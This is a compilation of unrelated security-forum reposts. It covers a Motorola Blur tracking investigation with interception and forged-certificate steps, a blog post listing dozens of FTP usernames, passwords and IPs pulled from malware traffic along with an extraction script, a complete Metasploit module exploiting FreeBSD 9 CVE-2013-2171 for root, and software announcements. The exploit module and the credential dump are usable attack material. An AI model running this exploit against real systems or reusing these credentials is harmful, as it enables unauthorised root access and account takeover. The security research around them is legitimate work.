Except when it doesn't, which is most of the time.

    "However, no data stored on a mobile device or transmitted over a wireless or interactive network can ever be 100 percent secure, and many of the communications you make using MOTOROLA MOBILE SERVICES will be accessible to third parties. You should therefore be cautious when submitting any personally identifiable information using MOTOROLA MOBILE SERVICES, and you understand that you are using MOTOROLA MOBILE SERVICES at your own risk. As a global company, Motorola has international sites and users all over the world. The personal information you provide may be transmitted, used, stored, and otherwise processed outside of the country where you submitted that information, including jurisdictions that may not have data privacy laws that provide equivalent protection to such laws in your home country. You may not ... interfere with anyone's ... enjoyment of the Services"

Uh oh. That document does mention that anyone who wants to opt out can email privacy@motorola.com. If you have any luck with that, please let me know.

Why this is a problem

While I'm sure there are a few people out there who don't mind a major multinational corporation collecting this sort of detailed tracking information related to where their phone has been and how it's been used, I believe most people would at least like to be asked about participating in this type of activity, and be given an option to turn it off. I can think of many ways that Motorola, unethical employees of Motorola, or unauthorized third parties could misuse this enormous treasure trove of information. But the biggest question on my mind is this: now that it is known that Motorola is collecting this data, can it be subpoenaed in criminal or civil cases against owners of Motorola phones? That seems like an enormous can of worms, even in comparison to the possibilities for identity theft that Motorola's system provides for.

How secure is Motorola's Blur web service against attack? I'd be really interested to test this myself, but made no attempt to do so because I don't have permission and Motorola doesn't appear to have a "white hat"/"bug bounty" programme. It would be a tempting target for technically-skilled criminals, due to the large volume of Facebook, Twitter, and Google usernames and passwords stored in it.
The fact that the phone actively polls Motorola for new instructions to execute and then follows those instructions without informing its owner opens all of these phones up to automated takeover by anyone who can obtain a signing SSL certificate issued by one of the authorities in the trusted CA store on those phones. Some people may consider this far-fetched, but consider that certificates of that type have been mistakenly issued in the past, and the root certificate for at least one of the CAs responsible for that type of mistake (TURKTRUST) was installed on my phone at the factory.

Is there anything good to be found here?

Motorola does appear to be using reasonably strong authentication for the oAuth login to their system - the username seems to be a combination of the IMEI and a random number (16 digits long[2], in the case of my phone's username), and the password is a 160-bit value represented as a hex string. This would be essentially impossible to attack via brute force if the value really is random. Due to its length, I'm concerned it's a hash of a fixed attribute of the phone, but that's just a hunch. The non-oAuth components (e.g. XMPP) use the Blur ID as the username, and that is all over the place, e.g. in virtually every URL (HTTP and HTTPS) that the client accesses on the Blur servers.

When uploading images to social networking sites, the Motorola software on the phone sometimes strips the EXIF tags (including geolocation tags) before uploading the image to Motorola. So at least they can't always use that as another method for determining your location.

Finally, both the XMPP and HTTPS client components of the software do validate that the certificates used for encrypted communication were issued by authorities the phone is configured to trust. If the certificate presented to either component is not trusted, then no encrypted channel is established, and data which would be sent over it is queued until a trusted connection can be made. If someone wants to perform a man-in-the-middle attack, they're going to need to get their root CA cert loaded on the target phones, or obtain a signing cert issued by a trusted authority (e.g. TURKTRUST). (A small illustration of this kind of validation check appears at the end of this section.)

[Screenshots: At least their software checks SSL cert validity - Untrusted cert - HTTPS client; Untrusted cert - XMPP client.]

Has anyone else discovered this?

In January of 2012, a participant in a Motorola pre-release test discovered that Motorola was performing device-tracking after a Motorola support representative mentioned that the tester had reset his phone "21 times", and a forum moderator directed him to the special, hard-to-find Motorola privacy policy discussed above. To my knowledge, this article is the first disclosure of anything like the full extent of the data Motorola collects.
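Returning to the certificate-validation behaviour described above: the check the Blur clients appear to perform is the standard one, and a minimal Python sketch of the same idea (requires Python 3.7+ for ssl.SSLCertVerificationError; the hostname is a placeholder, not one of Motorola's servers) looks like this:

# Minimal sketch: open a TLS connection and refuse to proceed unless the server
# certificate chains to a trusted CA and matches the hostname - the same
# behaviour observed in the Blur HTTPS and XMPP clients.
import socket
import ssl

host, port = "example.com", 443   # placeholder endpoint

context = ssl.create_default_context()   # verifies the chain and hostname by default
try:
    with socket.create_connection((host, port), timeout=10) as raw:
        with context.wrap_socket(raw, server_hostname=host) as tls:
            print("Trusted connection established:", tls.version())
            print("Peer certificate subject:", tls.getpeercert().get("subject"))
except ssl.SSLCertVerificationError as err:
    # An interceptor presenting an untrusted certificate ends up here; no data is sent.
    print("Certificate not trusted, refusing to send data:", err)

The practical consequence is the one the author draws: intercepting this traffic requires getting your own CA certificate onto the device, or a certificate mis-issued by an already-trusted authority.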
What I am going to do as a result of this discovery

As of 23 June 2013, I've removed my ActiveSync configuration from the phone, because I can't guarantee that proprietary corporate information isn't being funneled through Motorola's servers. I know that some information (like the name of our ActiveSync server, our domain name, and a few examples of our account-naming conventions) is, but I don't have time to exhaustively test to see what else is being sent their way, or to do that every time the phone updates its configuration. I've also deleted the IMAP configuration that connected to my personal email, and have installed K-9 Mail as a temporary workaround.

I'm going to figure out how to root this phone and install a "clean" version of Android. That will mean I can't use ActiveSync (my employer doesn't allow rooted phones to connect), which means a major reason I use my phone will disappear, but better that than risk sending their data to Motorola. I'll assume that other manufacturers and carriers have their own equivalent of this - recall the Carrier IQ revelation from 2011.

Which other models of Motorola device do this?

Right now, I have only tested my Droid X2. If you have a Motorola device and are technically inclined, the steps to reproduce my testing are in the section below. If you get results either way and would like me to include them here, please get in touch with me using the Contact form. Please include the model of your device, the results of your testing, and your name/nickname/handle/URL/etc. if you'd like to be identified.

Steps to reproduce - HTTP/HTTPS data capture

There are a number of approaches that can be used to reproduce the results in this article. This is the method that I used. Of course, the same testing can be performed in order to validate that non-Motorola devices are or are not behaving this way.

Important: I strongly recommend that you do not modify in any way the data your phone sends to Motorola. I also strongly recommend that you do not actively probe, scan, or test in any way the Blur web service. The instructions on this page are intended to provide a means of passively observing the traffic to Motorola in order to understand what your phone may be doing without your knowledge or consent.

1. Connect a wireless access point to a PC which has at least two NICs. Use Windows Internet Connection Sharing to give internet access to the wireless AP and its clients.
2. Set up an intercepting proxy on the PC. I used Burp Suite Professional for the first part of my testing, then switched to OWASP ZAP (which is free) for the rest, since I used a personal system for that phase. Make sure the proxy is accessible on at least one non-loopback address so that other devices can proxy through it.[1]
3. Configure a Motorola Android device to connect to the wireless AP, and to use the intercepting proxy for its web traffic (in the properties for that wireless connection).
4. Install the root signing certificate for the intercepting proxy on the Motorola Android device. This allows the intercepting proxy to view HTTPS traffic as well as unencrypted HTTP.
5. Power the Motorola Android device off, then back on. This seems to be necessary to cause all applications to recognize the new trusted certificate, and will also let you intercept the oAuth negotiation with Motorola.
6. Configure and use anything in the Account section of the device.
7. Use the built-in Social Networking application.
8. Take a picture and use the Share function to upload it to one or more photo-sharing services.
9. Leave the device on for long enough that it sends other system data to Motorola automatically.

Steps to reproduce - check-in data decompression

If you'd like to decompress one of these gzipped data packages, there are also a number of approaches available, but this is the one I used (a small script that automates the hex-editing and decompression steps appears at the end of this post):

1. Export the raw (binary) request from your intercepting proxy's proxy history. In ZAP, right-click on the history entry and choose Save Raw -> Request -> Body. In Burp Suite, right-click on the history entry and choose Save Item, then uncheck the Base64-encode requests and responses box before saving. Note: the bulk export feature of either tool will not work for this step - both of them have a quirk in which exporting individual requests preserves binary data, but exporting in bulk corrupts binary data by converting a number of values to 0x3F (maybe it's some Java library that does that when exporting as ASCII?).
2. Open the exported data in a hex editor (I use WinHex).
3. Remove everything up to the first 0x1F8B in the file. See example screenshot below.
4. Save the modified version (I added a .gz extension for clarity). See example screenshot below.
5. Decompress the resulting file using e.g. the Linux gzip -d command, or 7-zip.
6. Open the decompressed file in a text editor that correctly interprets Unix-style line breaks (I used Notepad++, partly because it shows unprintable characters in a useful way, and there is some binary data mixed in with the text in these files).
7. Examine the data your phone is sending to Motorola.

[Screenshots: Manually removing extra data so the file will be recognized as gzipped - "GZip header (0x1F8B)", "Hex editor view of the data", "Hex editing complete"]

Steps to reproduce - XMPP communication channel

This section requires more technical skill and time to replicate than the other two. Right now, it assumes that you have access to a Linux system that is set up with two network interfaces and which can be easily configured to forward all network traffic from the first interface to the second using iptables. If you have a system that is set up to run Mallory successfully already (even though you won't be using Mallory itself here), that would be ideal. I am preparing a detailed ground-up build document and will release that shortly. In the meantime, assuming you have such a system and some experience using this sort of thing, download XMPPPeek and you should have the tool you need.

Generate an SSL server certificate and private key (in PEM format) with the common name of *.svcmot.com. I made all of the elements of my forged cert match the real one as closely as possible, but I don't know how important this is other than the common name.

Load the CA cert you signed the *.svcmot.com cert with onto your Motorola Android device.
Again, I used a CA cert that matched the human-readable elements of the one used by the real server, but I don't know how important that is in this specific case. You may need to explicitly install the forged *.svcmot.com cert onto your Motorola Android device as well.

Run the shell script from the XMPPPeek page to cause all traffic from the internal interface to be forwarded to the external interface, with the exception of traffic with a destination port of 5222, which should be routed to the port that XMPPPeek will be listening on.

Start XMPPPeek and wait for your phone to connect.

I used a VirtualBox VM with a virtual NIC which was connected for internet access, and a USB NIC which I connected to an old wireless access point. So my phone connected to that AP, which connected through the man-in-the-middle system, which connected to the actual internet connection. I configured the phone to also proxy web traffic through OWASP ZAP so that I could match up the XMPP traffic with its HTTP and HTTPS counterparts.

Footnotes

1. For example, with the default Windows ICS configuration, you can bind the proxy to 192.168.137.1:8071.
2. Mine starts with a 4, but does not pass a Luhn check, in case you were curious.

Sursa: Motorola Is Listening - Projects - Beneath the Waves
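As promised in the check-in decompression section, the hex-editing and gzip steps are easy to script. Below is a minimal Python sketch (not part of the original article; the script name and input file name are placeholders): it finds the first gzip magic bytes (0x1F 0x8B), discards everything before them, and decompresses the rest.

#!/usr/bin/env python
# Minimal sketch: carve out and decompress the first gzip stream
# from an exported raw request body.
import sys
import zlib

def extract_checkin(path):
    with open(path, "rb") as f:
        raw = f.read()
    offset = raw.find(b"\x1f\x8b")            # first gzip magic, as described above
    if offset == -1:
        raise ValueError("no gzip header (0x1F8B) found in " + path)
    # 16 + MAX_WBITS tells zlib to expect a gzip wrapper; a decompressobj
    # leaves any trailing bytes after the stream in unused_data instead of failing
    return zlib.decompressobj(16 + zlib.MAX_WBITS).decompress(raw[offset:])

if __name__ == "__main__":
    sys.stdout.write(extract_checkin(sys.argv[1]).decode("utf-8", "replace"))

Usage would be along the lines of: python extract_checkin.py exported_body.bin > checkin.txt, then inspect checkin.txt in a text editor as described above.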
  9. Fucking cURL... For those of you still making requests with that shitty cURL, make sure you replace the spaces in the URL with "+": curl_setopt ($ch, CURLOPT_URL, str_replace(' ', '+', $_GET['url']));
  10. [h=3]Infiltrating malware servers without doing anything[/h] Today i was searching more samples of BlackPOS because this malware use FTP protocol. And knowing this, i was interested to crawl more panels but then i realised something... Why did i look only for BlackPOS, instead of targeting everything ? So i downloaded a random malware pack found on internet and send everything to Cuckoo. After i've just parsed each of these generated pcaps to get some stuff (simple but effective) Everything automated of course, it's too enormous to do that manually, especially on malware pack. Cuckoo. pcap junkie. Here is a small part: ftp://u479622:y6yf2023@212.46.196.140 - Win32/Usteal ftp://4bf3-cheats:hydsaww56785678@193.109.247.80 - Win32/Usteal ftp://u445497390:090171qq@31.170.164.56 - Win32/Usteal ftp://raprap8:9Y7cGxOW@89.108.68.81 - Win32/Usteal ftp://u195253707:1997qwerty@31.170.165.230 - Win32/Usteal ftp://pronzo_615:f4690x0nq8@91.223.216.18 - Win32/Usteal ftp://lordben8:xCoMFM2c@89.108.68.89 - Win32/Usteal ftp://u698037800:denisok1177@31.170.165.251 - Win32/Usteal ftp://u268995895:vovamolkov123@31.170.165.187 - Win32/Usteal ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Ganelp.gen!A ftp://oiadoce:cremado33@187.17.122.141 - Win32/Delf.P ftp://cotuno:nokia400@198.23.57.29 - Win32/SecurityXploded.A ftp://fake01:13758@81.177.6.51 - WS.Reputation.1 ftp://h51694:2222559@91.227.16.13 - Win32/Usteal ftp://fintzet5@mail.ru:856cc58e698f@93.189.41.96 - Win32/Usteal ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Usteal ftp://h51694:2222559@91.227.16.13 - Win32/Ganelp.E ftp://450857:6a5124c7@83.125.22.167 - Win32/Ganelp.gen!A ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Ganelp.gen!A ftp://getmac:8F4ODYLQlvpjjQ==@222.35.250.56 - Win32/Ganelp.G ftp://u797638036:951753zx@31.170.165.29 - Virus.Downloader.Rozena ftp://b12_8082975:djdf3549384@10.0.2.15 - Win32/Ganelp.gen!A ftp://onthelinux:741852abc@209.202.252.54 - Win32/Ganelp.E ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Ganelp.E ftp://450857:6a5124c7@83.125.22.167 - Win32/Ganelp.gen!A ftp://u206748555:as3515789@31.170.165.165 - Win32/Usteal ftp://fintzet5@mail.ru:856cc58e698f@93.189.41.96 - Win32/Usteal ftp://griptoloji:3INULAX@46.16.168.174 - Win32/Usteal ftp://u459704296:ded7753191ded@31.170.164.244 - Win32/Usteal ftp://dedmen2:reaper24chef@176.9.52.231 - Win32/Usteal ftp://srv35913:JLN18Hp7@78.110.50.123 - F*ck this shit ftp://ftp1970492:ziemniak123@213.202.225.201 - F*ck this shit ftp://dron2258:NRm8CNfW@89.108.68.89 - F*ck this shit ftp://u996543000:123456789a@31.170.165.235 - F*ck this shit ftp://u500739002:jd7H2ni99s@31.170.165.199 - F*ck this shit ftp://0dmaer:1780199d@193.109.247.83 - F*ck this shit ftp://u404100999:vardan123@31.170.164.25 - F*ck this shit ftp://a9951823:www.ry123456@31.170.161.56 - F*ck this shit ftp://u194291799:80997171405@31.170.165.18 - F*ck this shit ftp://u478149:qqgclnbi@212.46.196.140 - F*ck this shit ftp://u114972719:1052483w@31.170.165.192 - F*ck this shit ftp://a1954396:omeromer123@31.170.162.103 - F*ck this shit ftp://googgle.ueuo.com:741852@5.9.82.27 - F*ck this shit ftp://fr32920:Nw3hRUme@92.53.98.21 - F*ck this shit ftp://u974422848.root:vertrigo@31.170.164.119 - F*ck this shit ftp://u205783311:gomogej200897z@31.170.165.192 - F*ck this shit ftp://u188483768:andrewbogdanov1@31.170.165.251 - F*ck this shit ftp://coinmint@coinslut.com:c01nm1nt!@108.170.30.2 - F*ck this shit ftp://agooga:nokiamarco@198.23.57.29 - F*ck this shit ftp://nicusn:n0305441@198.23.57.29 - F*ck this shit 
ftp://u355595964:xmNmK4CfvX@31.170.165.193 - F*ck this shit ftp://fmstu421:oxjQG1i7@46.4.94.180 - F*ck this shit ftp://u651787226:123698745s@31.170.164.98 - F*ck this shit ftp://u492312765:530021354@31.170.165.250 - F*ck this shit ftp://mandaryn:m0jak0chanaania@213.180.150.18 - F*ck this shit ftp://spechos8:onxGoTDG@89.108.68.85 - F*ck this shit ftp://6fidaini:vardan123@193.109.247.80 - F*ck this shit ftp://8steamsell:frozenn1@195.216.243.45 - F*ck this shit ftp://u478644:57zw1q56@212.46.196.138 - F*ck this shit ftp://u478230:lytlz3ub@212.46.196.133 - F*ck this shit ftp://u730739228:warhammer3@31.170.165.238 - F*ck this shit ftp://sme8:y6kByIZA@89.108.68.85 - F*ck this shit ftp://koctbijib1@mail.ru:83670bb9072b@93.189.41.100 - F*ck this shit ftp://u457127536:741852963q@31.170.165.245 - F*ck this shit ftp://u450728967:987456987@31.170.165.187 - F*ck this shit ftp://u730739228:warhammer3@31.170.165.238 - F*ck this shit ftp://0lineage2-world:plokijuh@195.216.243.7 - F*ck this shit ftp://expox@1:0628262733Y@188.40.138.148 - F*ck this shit ftp://admin@enhanceviews.elementfx.com:123456@198.91.81.3 - F*ck this shit ftp://ih_3676461:123456@209.190.85.253 - F*ck this shit ftp://0alfa-go-cs:killer2612@195.216.243.45 - F*ck this shit ftp://5nudapac:nudapac@195.216.243.82 - F*ck this shit ftp://450857:6a5124c7@83.125.22.167 - F*ck this shit I've added signature manually by browsing VirusTotal report but i got too many results so i've just leaved 'F*ck this shit' to all of them. Crawling VirusTotal with the API can be also an idea to retrieve results but i'm lazy. Looking at random pcap i've found some was fun: Malware using free hosting service is a bad idea: Malware builded with wrong datas (epic failure) Malware badly coded: Infecting yourself with Ardamax and enabling all features on it is a bad idea: Another configuration failure: FTP's full of sh*t: You can learn about actors, eg from dedmen2@176.9.52.231, emo boy (i've included him on the ftp list): Protip: don't buy a Nikon Coolpix L14v1.0, low quality picture. I got also some false positive, this one is fun because it's a server against malware infection: I have no idea why UsbFix was on a malware pack, anyway the use of FTP protocol for legit tools is also a bad idea, and this is not the only 'anti-malware' server i've found, got some weird stuff for viral update and many others, this technic is a double edged sword but most of result lead on malware servers. Posted by Steven K at 00:18 Sursa: XyliBox: Infiltrating malware servers without doing anything
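For anyone who wants to reproduce this kind of bulk triage, the parsing step described above - pulling FTP credentials out of the pcaps Cuckoo generates - only takes a few lines. Here is a minimal Python sketch (not the author's actual tooling), assuming scapy is installed; the pcap file name is a placeholder. It scans client traffic to port 21 for USER/PASS commands and prints results in the same ftp://user:pass@host form as the list above.

# Minimal sketch: pull FTP USER/PASS commands out of a Cuckoo-generated pcap.
# Assumes scapy is installed; the pcap path is passed on the command line.
import sys
from scapy.all import rdpcap, IP, TCP, Raw

def ftp_credentials(pcap_path):
    creds = {}                                    # dst ip -> {"USER": ..., "PASS": ...}
    for pkt in rdpcap(pcap_path):
        if IP in pkt and TCP in pkt and Raw in pkt and pkt[TCP].dport == 21:
            for line in bytes(pkt[Raw].load).splitlines():
                for cmd in (b"USER ", b"PASS "):
                    if line.upper().startswith(cmd):
                        entry = creds.setdefault(pkt[IP].dst, {})
                        entry[cmd.strip().decode()] = line[len(cmd):].decode("latin-1")
    return creds

if __name__ == "__main__":
    for host, c in ftp_credentials(sys.argv[1]).items():
        print("ftp://%s:%s@%s" % (c.get("USER", "?"), c.get("PASS", "?"), host))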
  11. Linux Kernel in a Nutshell This is the web site for the book, Linux Kernel in a Nutshell, by Greg Kroah-Hartman, published by O'Reilly. About [TABLE] [TR] [TD] To quote the "official" O'Reilly site for the book: Written by a leading developer and maintainer of the Linux kernel, Linux Kernel in a Nutshell is a comprehensive overview of kernel configuration and building, a critical task for Linux users and administrators. No distribution can provide a Linux kernel that meets all users' needs. Computers big and small have special requirements that require reconfiguring and rebuilding the kernel. Whether you are trying to get sound, wireless support, and power management working on a laptop or incorporating enterprise features such as logical volume management on a large server, you can benefit from the insights in this book. Linux Kernel in a Nutshell covers the entire range of kernel tasks, starting with downloading the source and making sure that the kernel is in sync with the versions of the tools you need. In addition to configuration and installation steps, the book offers reference material and discussions of related topics such as control of kernel options at runtime. A key benefit of the book is a chapter on determining exactly what drivers are needed for your hardware. Also included are recipes that list what you need to do to accomplish a wide range of popular tasks. To quote me, the author of the book: If you want to know how to build, configure, and install a custom Linux kernel on your machine, buy this book. It is written by someone who spends every day building, configuring, and installing custom kernels as part of the development process of this fun, collaborative project called Linux. I'm especially proud of the chapter on how to figure out how to configure a custom kernel based on the hardware running on your machine. This is an essential task for anyone wanting to wring out the best possible speed and control of your hardware. [/TD] [TD][/TD] [/TR] [/TABLE] Audience This book is intended to cover everything that is needed to know in order to properly build, customize, and install the Linux kernel. No programming experience is needed to understand and use this book. Some familiarity with how to use Linux, and some basic command-line usage is expected of the reader. This book is not intended to go into the programming aspects of the Linux kernel; there are many other good books listed in the Bibliography that already cover this topic. Secret Goal (i.e. why I wrote this book and am giving it away for free online) I want this book to help bring more people into the Linux kernel development fold. The act of building a customized kernel for your machine is one of the basic tasks needed to become a Linux kernel developer. The more people that try this out, and realize that there is not any real magic behind the whole Linux kernel process, the more people will be willing to jump in and help out in making the kernel the best that it can be. License This book is available under the terms of the Creative Commons Attribution-ShareAlike 2.5 license. That means that you are free to download and redistribute it. The development of the book was made possible, however, by those who purchase a copy from O'Reilly or elsewhere. Kernel version The book is current as of the 2.6.18 kernel release, newer kernel versions will cause some of the configuration items to move around and new configuration options will be added. 
However the main concepts in the book still remain for any kernel version released. Downloads The book is available for download in either PDF or DocBook format for the entire book, or by the individual chapter. The entire history of the development of the book (you too can see why the first versions of the book were 1000 pages long) can be downloaded in a git repository. Linux Kernel in a Nutshell chapter files: [TABLE] [TR=class: Odd] [TD]Title page[/TD] [TD]PDF[/TD] [TD][/TD] [/TR] [TR=class: Even] [TD]Copyright and credits[/TD] [TD]PDF[/TD] [TD][/TD] [/TR] [TR=class: Odd] [TD]Preface[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Part I: Building the Kernel[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 1: Introduction[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Chapter 2: Requirements for Building and Using the Kernel[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 3: Retrieving the Kernel Source[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Chapter 4: Configuring and Building[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 5: Installing and Booting from a Kernel [/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Chapter 6: Upgrading a Kernel[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Part II: Major Customizations[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Chapter 7: Customizing a Kernel[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 8: Kernel Configuration Recipes[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Part III: Kernel Reference[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 9: Kernel Boot Command-Line Parameter Reference[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Chapter 10: Kernel Build Command-Line Reference[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 11: Kernel Configuration Option Reference[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Part IV: Additional Information[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Appendix A: Helpful Utilities[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Appendix B: Bibliography[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Index[/TD] [TD]PDF[/TD] [TD][/TD] [/TR] [/TABLE] Full Book Downloads: [TABLE] [TR=class: even] [TD] Tarball of all LKN PDF files (3MB)[/TD] [/TR] [TR=class: even] [TD] Tarball of all LKN DocBook files (1MB)[/TD] [/TR] [/TABLE] git tree of the book source can be browsed at http://git2.kernel.org/git/?p=linux/kernel/git/gregkh/lkn.git. To clone this tree, run: git clone git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/lkn.git Sursa: Linux Kernel in a Nutshell
  12. [h=1]FreeBSD 9 Address Space Manipulation Privilege Escalation[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit4 < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE include Msf::Post::Common include Msf::Post::File include Msf::Exploit::FileDropper def initialize(info={}) super( update_info( info, { 'Name' => 'FreeBSD 9 Address Space Manipulation Privilege Escalation', 'Description' => %q{ This module exploits a vulnerability that can be used to modify portions of a process's address space, which may lead to privilege escalation. Systems such as FreeBSD 9.0 and 9.1 are known to be vulnerable. }, 'License' => MSF_LICENSE, 'Author' => [ 'Konstantin Belousov', # Discovery 'Alan Cox', # Discovery 'Hunger', # POC 'sinn3r' # Metasploit ], 'Platform' => [ 'bsd' ], 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell' ], 'References' => [ [ 'CVE', '2013-2171' ], [ 'OSVDB', '94414' ], [ 'EDB', '26368' ], [ 'BID', '60615' ], [ 'URL', 'http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc' ] ], 'Targets' => [ [ 'FreeBSD x86', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => "Jun 18 2013", } )) register_options([ # It isn't OptPath becuase it's a *remote* path OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]), ], self.class) end def check res = session.shell_command_token("uname -a") return Exploit::CheckCode::Appears if res =~ /FreeBSD 9\.[01]/ Exploit::CheckCode::Safe end def write_file(fname, data) oct_data = "\\" + data.unpack("C*").collect {|e| e.to_s(8)} * "\\" session.shell_command_token("printf \"#{oct_data}\" > #{fname}") session.shell_command_token("chmod +x #{fname}") chk = session.shell_command_token("file #{fname}") return (chk =~ /ERROR: cannot open/) ? false : true end def upload_payload fname = datastore['WritableDir'] fname = "#{fname}/" unless fname =~ %r'/$' if fname.length > 36 fail_with(Exploit::Failure::BadConfig, "WritableDir can't be longer than 33 characters") end fname = "#{fname}#{Rex::Text.rand_text_alpha(4)}" p = generate_payload_exe f = write_file(fname, p) return nil if not f fname end def generate_exploit(payload_fname) # # Metasm does not support FreeBSD executable generation. # path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin") x = File.open(path, 'rb') { |f| f.read(f.stat.size) } x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/, payload_fname.ljust(40, "\x00")) end def upload_exploit(payload_fname) fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}" bin = generate_exploit(payload_fname) f = write_file(fname, bin) return nil if not f fname end def exploit payload_fname = upload_payload fail_with(Exploit::Failure::NotFound, "Payload failed to upload") if payload_fname.nil? print_status("Payload #{payload_fname} uploaded.") exploit_fname = upload_exploit(payload_fname) fail_with(Exploit::Failure::NotFound, "Exploit failed to upload") if exploit_fname.nil? print_status("Exploit #{exploit_fname} uploaded.") register_files_for_cleanup(payload_fname, exploit_fname) print_status("Executing #{exploit_fname}") cmd_exec(exploit_fname) end end Sursa: FreeBSD 9 Address Space Manipulation Privilege Escalation
  13. Hidden File Finder is a free tool to quickly scan and discover all the hidden files on your Windows system.

It performs a swift multi-threaded scan of all folders in parallel and quickly uncovers all the hidden files. It automatically detects hidden executable files (EXE, DLL, COM etc.) and shows them in red for easier identification. Similarly, hidden files are shown in black and hidden folders in blue.

One of its main features is the Unhide operation. You can select one or all of the discovered hidden files and unhide them with just a click. Successful unhide operations are shown with a green background, while failed ones are shown with a yellow background.

It is very easy to use with its GUI interface and will be particularly handy for penetration testers and forensic investigators. It is fully portable and works on both 32-bit & 64-bit platforms, from Windows XP to Windows 8.

Features
- Free, easy to use GUI based software
- Fast multi-threaded hidden file finder to quickly scan an entire computer, drive or folder
- Unhide all the hidden files with one click
- Color based representation of hidden files/folders/executable files and unhide operations
- Open the folder in Explorer by double clicking on the list
- Sort feature to arrange the hidden files based on name/size/type/date/path
- Detailed hidden file scan report in HTML format
- Fully portable and can be run from anywhere
- Also includes an installer for local installation/un-installation

Screenshots
Screenshot 1: Hidden File Finder showing all the hidden files/folders discovered during the scan
Screenshot 2: Detailed HTML report of the hidden file scanning operation

Release History
Version 1.0: 25th Jun 2013 - First public release of HiddenFileFinder

Download
FREE Download Hidden File Finder v1.0
License: Freeware
Platform: Windows XP, 2003, Vista, Windows 7, Windows 8
Download

Sursa: Hidden File Finder : Free Tool to Find and Unhide/Remove all the Hidden Files | www.SecurityXploded.com
  14. [h=1]Visual Studio 2013 Preview[/h]By: Robert Green Visual Studio 2013 Preview is here with lots of exciting new features across Windows Store, Desktop and Web development. Dmitry Lyalin joins Robert for a whirlwind tour of this preview of the next release of Visual Studio, which is now available for download. Dmitry and Robert show the following in this episode: Recap of Team Foundation Service announcements from TechEd [02:00], including Team Rooms for collaboration, Code Comments in changesets, mapping backlog items to features IDE improvements [11:00], including more color and redesigned icons, undockable Pending Changes window, Connected IDE and synchronized settings Productivity improvements [17:00], including CodeLens indicators showing references, changes and unit test results, enhanced scrollbar, Peek Definition for inline viewing of definitions Web development improvements [28:00], including Browser Link for connecting Visual Studio directly to browsers, One ASP.NET Debugging and diagnostics improvements [37:00], including edit and continue in 64-bit projects, managed memory analysis in memory dump files, Performance and Diagnostics hub to centralize analysis tools [44:00], async debugging [51:00] Windows Store app development improvements, including new project templates [40:00], Energy Consumption and XAML UI Responsiveness Analyzers [45:00], new controls in XAML and JavaScript [55:00], enhanced IntelliSense and Go To Definition in XAML files [1:00:00] Visual Studio 2013 and Windows 8.1: Visual Studio 2013 Preview download Visual Studio 2013 Preview announcement Windows 8.1 Preview download Windows 8.1 Preview announcement Additional resources: Visual Studio team blog Brian Harry's blog ALM team blog Web tools team blog Modern Application Lifecycle Management talk at TechEd Microsoft ASP.NET, Web, and Cloud Tools Preview talk at TechEd Using Visual Studio 2013 to Diagnose .NET Memory Issues in Production What's new in XAML talk at Build What's new in WinJS talk at Build [h=3]Download[/h] [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, WP7, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) [h=3]File size[/h] 58.9 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 355.3 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 174.0 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 781.7 MB Mid Quality MP4 (WP7, HTML5) [h=3]File size[/h] 545.2 MB High Quality WMV (PC, Xbox, MCE) Sursa: Visual Studio 2013 Preview | Visual Studio Toolbox | Channel 9
